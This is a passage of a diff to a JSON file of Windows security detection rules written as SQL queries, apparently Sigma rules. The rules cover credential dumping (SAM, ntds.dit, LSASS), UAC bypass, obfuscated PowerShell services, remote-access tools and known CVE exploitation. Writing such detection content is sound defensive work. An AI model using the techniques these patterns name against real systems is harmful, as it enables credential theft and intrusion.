'%\\\\Bin\\\\ccSvcHst.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\uwfservicingscr.scr' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" ], - "filename": "file_event_win_creation_scr_binary_file.yml" + "filename": "win_security_susp_logon_explicit_credentials.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "title": "Remote Access Tool Services Have Been Installed - Security", + "id": "c8b00925-926c-47e3-beea-298fd563728e", "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", + "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.persistence", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "The rule doesn't look for anything suspicious so false positives are expected. If you use one of the tools mentioned, comment it out" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_service_install_remote_access_software.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_powershell_script_installed_as_service.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", - "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Secure Deletion with SDelete", + "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "status": "test", + "description": "Detects renaming of file while deletion with SDelete tool.", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Legitimate usage of SDelete" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_susp_sdelete.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare cases of administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_sam_dump.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "ISO or Image Mount Indicator in Recent Files", - "id": "4358e5a5-7542-4dcb-b9f3-87667371839b", + "title": "DCERPC SMB Spoolss Named Pipe", + "id": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", "status": "test", - "description": "Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.\nThis can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "author": "OTR (Open Threat Research)", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ], "falsepositives": [ - "Cases in which a user mounts an image file for legitimate reasons" + "Domain Controllers acting as printer servers too? :)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.iso.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.img.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhd.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.vhdx.lnk' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss')" ], - "filename": "file_event_win_iso_file_recent.yml" + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml" }, { - "title": "Potential Binary Or Script Dropper Via PowerShell.EXE", - "id": "7047d730-036f-4f40-b9d8-1c63e36d5e62", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", "status": "experimental", - "description": "Detects PowerShell creating a binary executable or script file.", - "author": "frack113", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ - "attack.persistence" + "attack.credential_access", + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." + "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\_\\_PSScriptPolicyTest\\_%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_powershell_drop_binary.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", - "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": "8400629e-79a9-4737-b387-5db940ab2367", + "status": "test", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "Unauthorized System Time Modification", + "id": "faa031b5-21ed-4e02-8881-2591f98d82ed", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", + "author": "@neu5ron", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1070.006" ], "falsepositives": [ - "Unknown" + "HyperV or other virtualization technologies with binary not listed in filter portion of detection" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4616' AND NOT (((ProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\VBoxService.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND SubjectUserSid = 'S-1-5-19')))" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "win_security_susp_time_modification.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - Security", + "id": "7a922f1b-2635-4d6c-91ef-af228b198ad3", + "status": "experimental", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%new-object%' ESCAPE '\\' AND ServiceFileName LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ServiceFileName LIKE '%readtoend%' ESCAPE '\\' AND (ServiceFileName LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ServiceFileName LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_invoke_obfuscation_via_compress_services_security.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate add-ins" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "title": "Remote Task Creation via ATSVC Named Pipe", + "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", + "status": "test", + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE '%WriteData%' ESCAPE '\\')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": "win_security_atsvc_task.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "status": "test", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1542.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", - "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "status": "test", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", - "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "status": "test", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1222.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, - { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + { + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", 